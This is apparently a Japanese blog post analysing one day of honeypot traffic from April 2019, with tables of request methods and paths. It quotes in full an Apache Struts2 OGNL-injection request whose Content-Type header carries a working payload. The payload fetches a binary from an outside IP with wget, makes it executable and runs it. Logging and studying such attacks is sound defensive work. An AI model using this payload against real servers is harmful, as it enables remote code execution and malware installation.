honeypotの簡易解析23日目

2019-04-23のアクセス数は82件でした。

■送信元IPアドレスの数は 68件です。

■メソッドの一覧と件数は以下です。

method総数
GET80
POST2
合計 結果82

■アクセスパス一覧と件数は以下です。

pathmethod総数
/ GET65
//a2billing/customer/templates/default/footer.tplGET2
/favicon.icoGET1
/index.actionGET9
/login.actionGET1
/manager/htmlGET1
/tmUnblock.cgiPOST2
http://110.249.212.46/testget?q=23333&port=80GET1

気になるlog

-=-=8件目のlog=-=-

[2019-04-23 01:56:06+0900] 122.114.166.149 hoge:8080 "GET /index.action HTTP/1.1" 200 False GET /index.action HTTP/1.1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
 Accept: /
 Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cd /tmp;wget http[:]//156.236.104.234[:]59862/esbah;chmod 777 esbah;./esbah').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
 Host: hoge:8080

Struts2の脆弱性ですね。まとめサイトはこちら

原理としては、Content-TypeにOGNL式をぶち込むと任意のコードが実行できるというもの。

まさにこれでしょ、っていうぐらいのPoCはこちら

落とされるマルウェアのVirusTotalはこちら

Linuxマルウェアか。ちょいちょい解析情報があるので、少し見てみたいですね。